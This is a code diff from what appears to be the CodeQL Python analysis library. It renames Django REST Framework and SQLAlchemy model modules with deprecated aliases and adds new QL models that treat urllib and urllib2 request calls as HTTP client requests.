/** A direct instantiation of `rest_framework.request.Request`. */
@@ -295,19 +295,8 @@ private module RestFramework {
result = API::moduleImport("rest_framework").getMember("response").getMember("Response")
}
/**
* A source of instances of `rest_framework.response.Response`, extend this class to model new instances.
*
* This can include instantiations of the class, return values from function
* calls, or a special parameter that will be set when functions are called by an external
* library.
*
* Use the predicate `Response::instance()` to get references to instances of `rest_framework.response.Response`.
*/
abstract class InstanceSource extends DataFlow::LocalSourceNode { }
/** A direct instantiation of `rest_framework.response.Response`. */
private class ClassInstantiation extends PrivateDjango::django::http::response::HttpResponse::InstanceSource,
private class ClassInstantiation extends PrivateDjango::DjangoImpl::Http::Response::HttpResponse::InstanceSource,
DataFlow::CallCfgNode {
ClassInstantiation() { this = classRef().getACall() }
@@ -329,8 +318,8 @@ private module RestFramework {
*
* See https://www.django-rest-framework.org/api-guide/exceptions/#api-reference
*/
module APIException {
/** A direct instantiation of `rest_framework.exceptions.APIException` or subclass. */
module ApiException {
/** A direct instantiation of `rest_framework.exceptions.ApiException` or subclass. */
private class ClassInstantiation extends HTTP::Server::HttpResponse::Range,
DataFlow::CallCfgNode {
string className;
@@ -366,4 +355,7 @@ private module RestFramework {
override string getMimetypeDefault() { none() }
}
}
/** DEPRECATED: Alias for ApiException */
deprecated module APIException = ApiException;
}

View File

@@ -137,7 +137,7 @@ module SqlAlchemy {
*
* See https://docs.sqlalchemy.org/en/14/core/connections.html#dbapi-connections.
*/
module DBAPIConnection {
module DBApiConnection {
/**
* A source of instances of DB-API Connections, extend this class to model new instances.
*
@@ -149,8 +149,8 @@ module SqlAlchemy {
*/
abstract class InstanceSource extends DataFlow::LocalSourceNode { }
private class DBAPIConnectionSources extends InstanceSource, PEP249::Connection::InstanceSource {
DBAPIConnectionSources() {
private class DBApiConnectionSources extends InstanceSource, PEP249::Connection::InstanceSource {
DBApiConnectionSources() {
this.(DataFlow::MethodCallNode).calls(Engine::instance(), "raw_connection")
or
this.(DataFlow::AttrRead).accesses(Connection::instance(), "connection")
@@ -169,6 +169,9 @@ module SqlAlchemy {
DataFlow::Node instance() { instance(DataFlow::TypeTracker::end()).flowsTo(result) }
}
/** DEPRECATED: Alias for DBApiConnection */
deprecated module DBAPIConnection = DBApiConnection;
/**
* Provides models for the `sqlalchemy.orm.Session` class
*

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,71 @@
/**
* Provides classes modeling security-relevant aspects of the `urllib` module, part of
* the Python standard library.
*
* See
* - https://docs.python.org/2/library/urllib.html
* - https://docs.python.org/3/library/urllib.html
*/
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides models for the `urllib` module, part of
* the Python standard library.
*
* See
* - https://docs.python.org/2/library/urllib.html
* - https://docs.python.org/3/library/urllib.html
*/
private module Urllib {
/**
* Provides models for the `urllib.request` extension library
*
* See https://docs.python.org/3.9/library/urllib.request.html
*/
module Request {
/**
* See
* - https://docs.python.org/3.9/library/urllib.request.html#urllib.request.Request
*/
private class RequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
RequestCall() {
this = API::moduleImport("urllib").getMember("request").getMember("Request").getACall()
}
override DataFlow::Node getAUrlPart() { result in [this.getArg(0), this.getArgByName("url")] }
override string getFramework() { result = "urllib.request.Request" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
/**
* See
* - https://docs.python.org/3.9/library/urllib.request.html#urllib.request.urlopen
*/
private class UrlOpenCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
UrlOpenCall() {
this = API::moduleImport("urllib").getMember("request").getMember("urlopen").getACall()
}
override DataFlow::Node getAUrlPart() { result in [this.getArg(0), this.getArgByName("url")] }
override string getFramework() { result = "urllib.request.urlopen" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
}
}

View File

@@ -0,0 +1,56 @@
/**
* Provides classes modeling security-relevant aspects of the `urllib2` module, part of
* the Python 2 standard library.
*
* See https://docs.python.org/2/library/urllib2.html
*/
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides models for the the `urllib2` module, part of
* the Python 2 standard library.
*
* See https://docs.python.org/2/library/urllib2.html
*/
private module Urllib2 {
/**
* See
* - https://docs.python.org/2/library/urllib2.html#urllib2.Request
*/
private class RequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
RequestCall() { this = API::moduleImport("urllib2").getMember("Request").getACall() }
override DataFlow::Node getAUrlPart() { result in [this.getArg(0), this.getArgByName("url")] }
override string getFramework() { result = "urllib2.Request" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
/**
* See
* - https://docs.python.org/2/library/urllib2.html#urllib2.urlopen
*/
private class UrlOpenCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
UrlOpenCall() { this = API::moduleImport("urllib2").getMember("urlopen").getACall() }
override DataFlow::Node getAUrlPart() { result in [this.getArg(0), this.getArgByName("url")] }
override string getFramework() { result = "urllib2.urlopen" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
}

Some files were not shown because too many files have changed in this diff Show More